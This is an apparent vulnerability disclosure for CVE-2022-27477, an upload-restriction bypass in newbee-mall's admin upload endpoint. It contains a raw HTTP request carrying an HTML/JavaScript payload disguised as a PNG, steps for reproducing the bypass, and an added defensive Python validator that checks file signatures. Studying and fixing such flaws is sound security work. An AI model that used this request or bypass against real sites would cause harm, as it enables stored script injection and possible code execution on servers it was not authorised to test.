CVE-2022-27477: A file upload vulnerability exists in newbee-mall · Issue #63 · newbee-ltd/newbee-mall
Newbee-Mall v1.0.0 was discovered to contain an arbitrary file upload via the Upload function at /admin/goods/edit.
[Suggested description]
A file upload vulnerability exists in NewBee mall, because the upload restriction in the upload method of UploadController can be bypassed by modifying the file format suffix.
[Vulnerability Type]
File upload vulnerability
[Vendor of Product]
https://github.com/newbee-ltd/newbee-mall
[Affected Product Code Base]
v1.0.0
[Affected Component]
POST /admin/upload/file HTTP/1.1
Host: localhost:28089
Content-Length: 671
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost:28089/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoXATzrr6JWhnTx5Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: iframe
Referer: http://localhost:28089/admin/goods/edit/10907
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=11D044F12F07C3F2772AC7EE836610E2
Connection: close
------WebKitFormBoundaryoXATzrr6JWhnTx5Q
Content-Disposition: form-data; name="file"; filename="1.html.png"
Content-Type: image/png
<script type="text/javascript" src="http://www.qq.com/404/search_children.js" charset="utf-8" homePageUrl="{{domain}}" homePageName="{{siteName}}"></script>
<script>alert("xss")</script>
</div>
</div>
------WebKitFormBoundaryoXATzrr6JWhnTx5Q--
[Impact Code execution]
true
[Vulnerability proof]
1. Access the address http://localhost:28089/admin/goods, select a commodity's information to modify and enter the file upload page.
2. Open the Burp Suite packet-capturing proxy and click to upload pictures.
3. By default, the system only supports JPG, PNG and GIF files. We can bypass them by modifying the file suffix.
4. Modify the value of filename to 1.html
   Get the access path of the uploaded file
   Complete the data update
5. Access the uploaded file's path, and the vulnerability reproduction is complete.
[Defective code]
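As an added example (not code from the newbee-mall project or from the issue author), the following Python shows the server-side check whose absence this report exploits. The suffix in the Content-Disposition filename and the Content-Type header are both sent by the client, which is why editing them in Burp is enough; the check below therefore derives the type from the file's magic bytes, compares it with the extension after the last dot, and chooses the stored name itself. It replays a reconstruction of the report's request body (same boundary, same HTML payload) and a constructed genuine PNG through a minimal multipart parser written for the example. All function and constant names are this example's own.

```python
"""Server-side validation for an image-only upload endpoint.

Added example, not code from the newbee-mall project. The Content-Type
header, the Content-Disposition filename and the suffix inside that
filename all come from the client, so the server decides the type from
the bytes it received and chooses the stored name itself.
"""
import os
import re
import secrets
from typing import Optional, Tuple

# Extension -> magic bytes the content must start with. Constructed for
# this example; only the three types the report says the form accepts.
SIGNATURES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
ALIASES = {".jpeg": ".jpg"}  # second spelling of the same suffix


class UploadRejected(ValueError):
    """Raised when an upload fails validation; the message is safe to log."""


def extension_of(filename: str) -> str:
    """Lower-cased extension after the LAST dot of the client's file name.

    "1.html.png" yields ".png" (and must then also pass the content check);
    "1.png.html" yields ".html" and is rejected by the allowlist.
    """
    base = os.path.basename(filename.replace("\\", "/"))  # drop any path part
    ext = os.path.splitext(base)[1].lower()
    return ALIASES.get(ext, ext)


def sniff_type(data: bytes) -> Optional[str]:
    """Extension whose signature matches the content, or None if none does."""
    for ext, sigs in SIGNATURES.items():
        if any(data.startswith(s) for s in sigs):
            return ext
    return None


def validate_upload(filename: str, data: bytes, max_bytes: int = 2 * 1024 * 1024) -> str:
    """Reject anything that is not a real image; return a server-chosen name.

    The client's Content-Type header is deliberately not an input: the
    report's request sends image/png above an HTML body, so it proves nothing.
    """
    if not data:
        raise UploadRejected("empty file")
    if len(data) > max_bytes:
        raise UploadRejected("file too large")
    ext = extension_of(filename)
    if ext not in SIGNATURES:
        raise UploadRejected(f"extension {ext or '(none)'} not allowed")
    sniffed = sniff_type(data)
    if sniffed is None:
        raise UploadRejected("content is not a recognised image")
    if sniffed != ext:
        raise UploadRejected(f"content is {sniffed} but name claims {ext}")
    # Random name + verified extension: no second suffix, no path characters.
    return secrets.token_hex(16) + ext


def decision(filename: str, data: bytes) -> str:
    """'accepted <stored name>' or 'rejected: <reason>' for one upload."""
    try:
        return "accepted " + validate_upload(filename, data)
    except UploadRejected as exc:
        return f"rejected: {exc}"


def parse_multipart_file(body: bytes, boundary: str) -> Tuple[str, bytes]:
    """(filename, content) of the first file part in a multipart/form-data body.

    Minimal parser written for this example so the captured request can be
    replayed offline; a real service uses its framework's multipart parser.
    """
    delimiter = b"--" + boundary.encode()
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):  # closing delimiter reached
            break
        head, _, content = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        headers = {}
        for line in head.decode("latin-1").split("\r\n"):
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        match = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
        if match:
            if content.endswith(b"\r\n"):  # CRLF that precedes the next delimiter
                content = content[:-2]
            return match.group(1), content
    raise UploadRejected("no file part in body")


BOUNDARY = "----WebKitFormBoundaryoXATzrr6JWhnTx5Q"  # boundary from the report


def build_body(filename: str, content_type: str, content: bytes) -> bytes:
    """Constructed multipart body in the shape of the report's request."""
    head = (f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="file"; '
            f'filename="{filename}"\r\nContent-Type: {content_type}\r\n\r\n')
    return head.encode() + content + f"\r\n--{BOUNDARY}--\r\n".encode()


def demo() -> dict:
    """Run the report's HTML-as-PNG upload and a genuine PNG through the check."""
    html = b'<script>alert("xss")</script>'  # payload line from the report
    png = SIGNATURES[".png"][0] + b"\x00" * 32  # constructed PNG-like bytes
    results = {}
    for label, body in {
        "html_as_png": build_body("1.html.png", "image/png", html),
        "html": build_body("1.html", "text/html", html),
        "real_png": build_body("1.png", "image/png", png),
    }.items():
        name, content = parse_multipart_file(body, BOUNDARY)
        results[label] = decision(name, content)
    return results


if __name__ == "__main__":
    for label, verdict in demo().items():
        print(f"{label}: {verdict}")
```

Running the block rejects both of the report's variants (the `.html` name fails the allowlist, the `.html.png` name passes it but the HTML body fails the signature check) and accepts only the genuine PNG, which is stored under a random name the client never chose. Serving the upload directory with `X-Content-Type-Options: nosniff` and a fixed image Content-Type is the matching defence on the download side.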